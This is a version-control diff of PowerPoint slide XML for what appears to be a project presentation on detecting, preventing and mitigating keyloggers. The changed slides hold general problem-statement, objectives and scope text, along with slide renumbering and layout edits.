-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>e</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="90" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>v</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="-35" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>i</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="35" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>e</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="15" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>w</a:t>
-            </a:r>
-            <a:endParaRPr sz="1100">
-              <a:latin typeface="Trebuchet MS"/>
-              <a:cs typeface="Trebuchet MS"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
           <p:cNvPr id="10" name="object 10"/>
           <p:cNvSpPr txBox="1">
             <a:spLocks noGrp="1"/>
@@ -5761,9 +8421,174 @@
             </a:pPr>
             <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
               <a:rPr spc="10" dirty="0"/>
-              <a:t>4</a:t>
+              <a:t>6</a:t>
             </a:fld>
             <a:endParaRPr spc="10" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="9" name="TextBox 8">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF7F3BC8-CA48-D1FF-7E38-FECC3E5AB055}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="834072" y="1358778"/>
+            <a:ext cx="9919653" cy="2246769"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2000" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Keyloggers are malicious software or hardware devices that capture and record keystrokes from a computer or mobile device. They pose a significant threat to cybersecurity by enabling attackers to steal sensitive information such as passwords, financial data, and personal communications.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2000" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>The main problem addressed in this project is the persistent threat posed by keyloggers to network security. This encompasses several sub-problems:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="11" name="TextBox 10">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00DD3E59-8AE0-7BD4-DBAB-6B2B63CF66DA}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1219200" y="3287047"/>
+            <a:ext cx="8210550" cy="3170099"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="800100" lvl="1" indent="-342900">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="v"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Detection Challenges:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="1257300" lvl="2" indent="-342900">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="§"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2000" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Keyloggers can be highly sophisticated, using advanced techniques to evade traditional detection mechanisms.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="800100" lvl="1" indent="-342900">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="v"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Prevention Difficulties:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="1257300" lvl="2" indent="-342900">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="§"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2000" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Preventing the installation of keyloggers is challenging due to multiple potential entry points, including phishing attacks, drive-by downloads, and physical access to devices</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="800100" lvl="1" indent="-342900">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="v"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Mitigation and Response:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="1257300" lvl="2" indent="-342900">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="§"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2000" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Once a keylogger is detected, removing it without disrupting normal operations can be complex.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -5775,7 +8600,264 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide5.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide7.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="TextBox 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{293173AE-B05A-34B3-7F46-E58252CDFE93}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="393290" y="255657"/>
+            <a:ext cx="6105832" cy="769441"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Objectives</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="TextBox 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FA45203-EB01-8C7A-E0DC-55C4C86B13B6}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="425245" y="609600"/>
+            <a:ext cx="8763000" cy="3170099"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Develop Advanced Detection Techniques:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="800100" lvl="1" indent="-342900">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="§"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Create and refine algorithms for detecting both software and hardware keyloggers.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="800100" lvl="1" indent="-342900">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="§"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Strengthen Preventive Measures:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="800100" lvl="1" indent="-342900">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="§"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Establish robust protocols and user education programs to prevent keylogger installation.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="800100" lvl="1" indent="-342900">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="§"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Enhance Mitigation Strategies:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="800100" lvl="1" indent="-342900">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="§"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Develop clear, actionable response plans for keylogger incidents, ensuring swift and effective removal</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="TextBox 4">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BEFFED2-B5B5-0E84-7682-A5B50447F34D}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="609600" y="4114800"/>
+            <a:ext cx="8382000" cy="1015663"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Scope:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Continuous evaluation and enhancement of the overall network security framework.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Research and development of detection and prevention technologies.</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3754956372"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide8.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -5931,56 +9013,6 @@
       </p:grpSp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="6" name="object 6"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="6696075" y="1695450"/>
-            <a:ext cx="314325" cy="323850"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="314325" h="323850">
-                <a:moveTo>
-                  <a:pt x="314325" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="0" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="323850"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="314325" y="323850"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="314325" y="0"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-          <a:solidFill>
-            <a:srgbClr val="2D83C3"/>
-          </a:solidFill>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
           <p:cNvPr id="7" name="object 7"/>
           <p:cNvSpPr txBox="1">
             <a:spLocks noGrp="1"/>
@@ -5991,7 +9023,7 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="739775" y="829627"/>
+            <a:off x="609600" y="381000"/>
             <a:ext cx="5263515" cy="678180"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
@@ -6023,205 +9055,7 @@
               <a:rPr sz="4250" spc="-20" dirty="0"/>
               <a:t>OVERVIEW</a:t>
             </a:r>
-            <a:endParaRPr sz="4250"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="8" name="object 8"/>
-          <p:cNvPicPr/>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId3" cstate="print"/>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="676275" y="6467475"/>
-            <a:ext cx="2143125" cy="200025"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="9" name="object 9"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="739775" y="6473337"/>
-            <a:ext cx="1798955" cy="191770"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="6985" rIns="0" bIns="0" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="12700">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="55"/>
-              </a:spcBef>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1100" spc="20" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>3/21/202</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" spc="10" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>4</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" spc="130" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="50" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>A</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="15" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>nnu</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="10" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>al</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="-140" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>R</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="35" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>e</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="90" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>v</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="-35" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>i</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="35" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>e</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="15" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>w</a:t>
-            </a:r>
-            <a:endParaRPr sz="1100">
-              <a:latin typeface="Trebuchet MS"/>
-              <a:cs typeface="Trebuchet MS"/>
-            </a:endParaRPr>
+            <a:endParaRPr sz="4250" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -6256,1642 +9090,799 @@
             </a:pPr>
             <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
               <a:rPr spc="10" dirty="0"/>
-              <a:t>5</a:t>
+              <a:t>8</a:t>
             </a:fld>
             <a:endParaRPr spc="10" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide6.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="object 2"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="9353550" y="5362575"/>
-            <a:ext cx="457200" cy="457200"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="457200" h="457200">
-                <a:moveTo>
-                  <a:pt x="457200" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="0" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="457200"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="457200" y="457200"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="457200" y="0"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-          <a:solidFill>
-            <a:srgbClr val="42AF51"/>
-          </a:solidFill>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:endParaRPr/>
           </a:p>
         </p:txBody>
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="3" name="object 3"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="6696075" y="1695450"/>
-            <a:ext cx="314325" cy="323850"/>
-          </a:xfrm>
